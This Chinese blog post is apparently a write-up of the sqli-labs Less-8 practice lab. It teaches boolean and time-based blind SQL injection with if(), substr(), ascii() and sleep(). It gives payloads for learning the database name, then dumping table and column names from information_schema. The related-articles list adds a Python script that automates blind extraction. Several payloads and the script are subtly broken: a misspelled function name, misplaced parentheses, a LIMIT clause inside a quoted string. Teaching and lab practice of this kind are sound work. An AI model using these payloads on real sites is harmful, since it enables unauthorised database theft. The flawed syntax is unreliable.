if的sql盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量392 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44574152/article/details/118468813
版权

SQL注入 布尔盲注 时间盲注 数据库探测 信息爆破
关键词由CSDN通过智能技术生成

前言:题目来源:sqli中的第八题,布尔盲注
1.主要涉及到函数
if(a,b,c)
 a是条件,满足返回b,不满足返回c
length()
 长度判断
ascii(a)
 判断字符的ascill值
substr(a,b,c)
 截取字符串,a为字符串,b为起始位置第一个就是1,c为偏位移量
2.布尔盲注
 故名思意结合布尔判断
 大家都应该知道这个?id=1' and 1=1 --+
 那么这个就不难理解?id=1' and if(a,b,c) --+
 接下来就是构造参数a 首先判断数据库长度?id=1 and if(length(database()=?),1,0) --+可以手动二分法判断,也可以爆破
 接下来就爆库,?id=1' and if(ascill(substr(database(),1,1))=变量,1,0) -++,爆破就好了
 爆表名,把参数a换为 select group_concat(table_name) from information_schema.tables where table_schema='数据库名 limit 0,1'
 爆字段名,把参数a换位 select group_concat(column_name) from information_schema.columns where table_name='表名 limit 0,1'
3.时间盲注
 其实时间盲注和基于布尔盲注,只不过把判断式的结果c更换为sleep(整数),表示睡眠该整数时间秒数。
 举个栗子:?id=1' and if(length(database())>0,sleep(5),0) --+
 数据库长度必然大于0,所以一定会睡眠5秒,应该很好理解,其他的就和上面讲解的布尔盲注大同小异了

TOKOKOKO
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql盲注if半段_Mysql手工盲注小结
weixin_42636454的博客
02-03 324
布尔型盲注原理:在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息MySQL盲注常用函数:length() #返回字符串的长度,例如可以返回数据库名字的长度substr() #用来截取字符串ascii() #返回字符的ascii码sleep(n) #将程序挂起...
sql盲注
weixin_48734687的博客
10-10 178
sql盲注 目录 什么是盲注 盲注原理 盲注分类 如何盲注 什么是盲注 当我们进行sql注入时,若向服务器发送的请求正确时,服务器会正常返回正确的数据;如果我们的请求是错误的,服务器不会返回任何信息。 盲注原理 盲注是我们向服务器发送一个逻辑判断请求,通过对返回值的真或假来分析数据库的结构和获取数据库的数据。 盲注分类 基于布尔的盲注 基于时间的盲注 如何盲注 以获取当前数据库名来介绍盲注步骤,获取其他数据与当前类似。 靶场:sqli-lab/less-8 1.在正确的参数后面加上’ 、"
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3582
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
SQL注入】盲注
4ut15m's blog
02-03 606
其他相关文章: SQL注入基础 报错注入 盲注 用于页面注入无回显并且不会打印错误信息的情况. 盲注类型 布尔型盲注,延时盲注 布尔型盲注 注入页面虽然无回显,但是根据注入造成的不同布尔值(true与false)页面会有不同的结果这便是布尔型盲注. if函数:if(condition, value_if_true, value_if_false),condition为判断条件,参...
SQL盲注
weixin_59872639的博客
02-18 2447
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
网络安全——SQL盲注
weixin_54055099的博客
09-15 724
SQL注入之盲注,基于布尔和时间的盲注
SQL盲注利用工具
11-15
SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询到应用程序,根据应用程序对异常情况的响应来推断数据库中的信息。在这种情况下,我们讨论的是一款名为"BSQLInjector"的工具...
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,...
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
2. **基于时间的SQL盲注**:利用延迟操作,如`if(条件,sleep(5),0)`。如果条件为真,查询会延迟,从而通过响应时间推断信息。 3. **基于报错的SQL盲注**:通过让数据库产生错误并观察错误信息来获取数据,例如使用`...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
SQL注入漏洞讲解
02-02
对于更高安全级别的注入,攻击者可能还需要采用更加复杂的方法,如盲注(Blind SQL Injection),这种技术不依赖于传统的错误消息或页面内容变化,而是通过构造特殊的查询来获取信息。 #### 五、总结 SQL注入仍然...
sql注入(盲注
2302_79119987的博客
04-23 1810
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入布尔盲注
qq_45557130的博客
10-04 759
sql注入布尔盲注
mysql 盲注 if_Mysql 另类盲注中的一些技巧
weixin_29982199的博客
02-02 176
转:oldjun.com—————————————————————————-很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL]...
查询数据库中所有列名
xianrenyingzi的专栏
12-14 4731
如何从整个数据库所有表中查找出一个列名?比如想要查找一个名为"name"的列名,但是忘记了这一列是在那一个表中,需要从整个数据库的所有表中进行查询。 Oracle 数据库: select * from user_col_comments s where s.column_name like 'NAME%'; MySQL数据库: SELECT * FROM information_schema.COLUMNS WHERE column_name like 'NAME%'; SqlServer数据库:
CTF中几种通用的sql盲注手法和注入的一些tips
xuchen16的博客
10-09 2570
转载自:https://www.anquanke.com/post/id/160584 0x00 前言 在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的...
sql盲注的一些小心得
热门推荐
微笑的孤狼
12-30 1万+
一、关于概念 sql 盲注是对于那些页面没有回显的错误,只能依靠自己的经验去一点一点猜测,这就比较耗费时间了, 具体的一些原理可以参考https://blog.csdn.net/qq_36706878/article/details/79530211 注:以下例子都是关于实验吧,简单的sql注入3,大家可以自行实验 二、开始实验 (1)、首先我们还是一样判断他是字符型还是数字型,我们发现...
my share source
最新发布
08-15
my share source
python写sql盲注详细注释
05-04
SQL盲注是利用Web应用程序对数据库执行SQL查询时的漏洞来获取数据库中敏感信息的一种攻击方式。攻击者通常使用一些特殊的字符来绕过应用程序的输入验证,最终获取一些敏感的数据,比如用户密码、信用卡号等。 以下是一个简单的Python脚本,用于进行SQL盲注攻击。这个脚本实现的是一个基于布尔逻辑的盲注攻击,它会尝试猜测数据库中某个字段的值,并根据返回结果逐步缩小猜测范围,最终得到正确的结果。 ```python import requests # 目标URL url = "http://example.com/vulnerable.php" # 漏洞字段名称 vulnParam = "id" # 猜测的字段值 guess = "" # ASCII码范围 asciiRange = range(32, 127) # 猜测的字段长度 length = 0 # 猜测字段长度 while True: # 构造SQL注入payload payload = f"' or length(({guess})))={length}-- " # 发送请求 response = requests.get(url, params={vulnParam: payload}) # 判断返回结果是否为True if "True" in response.text: length += 1 else: break # 猜测字段值 while True: found = False for i in asciiRange: # 构造SQL注入payload payload = f"' or ascii(substring(({guess}),1,1))={i}-- " # 发送请求 response = requests.get(url, params={vulnParam: payload}) # 判断返回结果是否为True if "True" in response.text: guess += chr(i) found = True break if not found: break # 输出结果 print(f"Found value: {guess}") ``` 代码解释: 1. 导入requests模块,用于发送HTTP请求。 2. 定义目标URL和漏洞字段名称。 3. 定义猜测的字段值,初始化为空。 4. 初始化ASCII码范围,这里使用了Python内置的range函数。 5. 初始化猜测字段长度为0。 6. 第一个while循环用于猜测字段长度。构造SQL注入payload时使用了length函数,通过逐步增加猜测长度,判断返回结果是否为True,来缩小猜测范围。 7. 第二个while循环用于猜测字段值。通过循环ASCII码范围,逐个尝试每个字符,构造SQL注入payload时使用了substring和ascii函数,来逐步缩小猜测范围。 8. 输出最终结果。 需要注意的是,这个脚本只是一个示例,实际使用时需要根据具体情况进行修改和优化。同时,SQL盲注是一种非常危险的攻击方式,需要谨慎使用,以免造成严重后果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值